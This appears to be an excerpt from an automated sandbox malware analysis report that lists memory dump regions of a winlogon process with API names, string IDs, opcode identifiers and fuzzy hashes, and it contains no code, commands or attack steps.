                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: a3441327fd192ba05e1bd0321bbdf2938bb54ef04919ac3b85a9ec6d852f5b6a
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 0F114F36A0874493FB258B21E40464B7770FB88B88F440026DE5D07758EB7EC94587C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: d868ca04b8d8586f6f6a390e290e58150676275038ac38a85c7b80935c32969b
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: DE115137A0874483FB258B21E4046497771FF48B98F44402AEA4D03758EB7ED545C7CA
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: f525cb24ccabdaef705eca32e391c6c3482e6c61b1592a8eb16db6a1036eaf3a
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 2151E273B417088AFB19CB25D054FADB391FB44B8DF984110EA9A57788DB7AC842C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: a759c82f011c931f3a48cb36091e1ef5e587e1df0f78fc6b8324226c07ede887
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 6051C133B417089AEB19CB25D084FA8B391FB54B9CF918128AA5547784DB7BC842C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 60e8b9d452b22d8066b229c291e107fc67761e130e05b0da0dcc3cb05f5680b7
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 2B51E533B917888AFB59CB15E044FAC7791FB94B9DF948110EA4A47B88D77AC841C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: ad04fe1eb2a1edeef54e6bc75b4d769991b9c3402fe3d2ab12d2ac4a189050a6
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 6C51D03398034887FBB68F119244B9877A0FB50B9EF944116DAC967B91CB3AC452C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: ed6a1ed037bc458e94a604c567b67e28dc429d86a9db094778d64014e96594a0
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: F361B433908BC881FB628F25E540BDEB7A0FB84799F445215EBC823B55DB39C091CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 10efc11f376cab87ef4acdaf2b77ccec9d4123c0fd27d91e5cae546ecccaa4a1
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: CA51B23398038887FBB68F119644B9877A1FB50B88F94811ADA5943B95C73BD553C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 2a22e60a9b3f854304751452df9d98a64753f55934e27dd4094366773aca3260
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 9C61B933908BC881EB728F15E5407DDB7A0FB85798F448219EB9817B55DB7EC192CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: ff7a276064ca23684de81406a1f68796b44ce7f86f6096a08643deba12328983
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: E351C1339843888BFB768F11E644B9877A0FB50B9EF944116DA8947BD1CB3AD450D783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 60592a73bcc56e8fc24094758dd9bb65472a20c058267f86d1c17b185443617f
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 3161AE33908BC881EB22CF15E540BDAB7A0FB85B99F444215EB9913B99DB7DC190CB42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 02134d3feda2e96eb50003ad244677908c7789116ae644b7e14578b12ac1f724
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 0E51D333A803888AFB768F51D244B987BA0FB54B9CF944119DA8D47BD5CB7AC451CB83
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 28175376d5654a325b6e3448a41641f0585f000515273b2e813776c3207c95cb
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 25119032B5878591FB129B25E8007DB72A4FF88789FC004219E4993694EF7AC807C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: f5c0b545fa3a07ccbfa5bb088918576c4613ccf87af992a5142b58f16c0f08fa
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: F411A532B5878551FB129B25E8007DA76A5BF48748FC08429AA4983694EF3BC90BC7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 913d229e8f2f92123c0244f313f8f46853348ecc3afd0aa29f5a796bf9d5dd00
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 6311DA3375078551FB129B25E8007DAB7A4FF84B4AFC004259E49C3695EF7AC985C783
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 0fe5e95353cfd2dd0c501b22aeddf9fd2a82a384c77f1e00d125b204ea73b71d
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: DFD1CB33B14B9889F712CFA5D440ADD37B1FB95B98F805116CE59ABB99DA35C00BC382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: dd6aa663578507b66a76ee1b3aff8a7eb3297d8e7c986e84e6755fe8025d9d4f
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: B1D1CA33B14B8889F712CFA5D440ADC37B1FB54B98F814216EE49A7B99DA36D107C386
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 18d3852c168644b29a851a8876877b9c6a5370015fb03373ffbcdf4b1c2788c7
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: FBD1C833B55B8889F712CFA5D440ADC37B1FB44B98F804256CE4EA7B9ADA35C106C382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 662269b3e822107970afb4c35fa0ae41ecd28bd6936e08448754d08bde8c420b
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 7F015732A50B84DAE715DF66A80499A77A0FBC8F88B894025DF4957728DE39D052C782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 72ca8a3ca2c797191b1185e72d0950ed6f6b3868902fa79715834b3bdb5aef3e
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 18018B32A40B94CAE715DF62A80459977A0FB88F84F868025EB4943718DE39E052C386
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
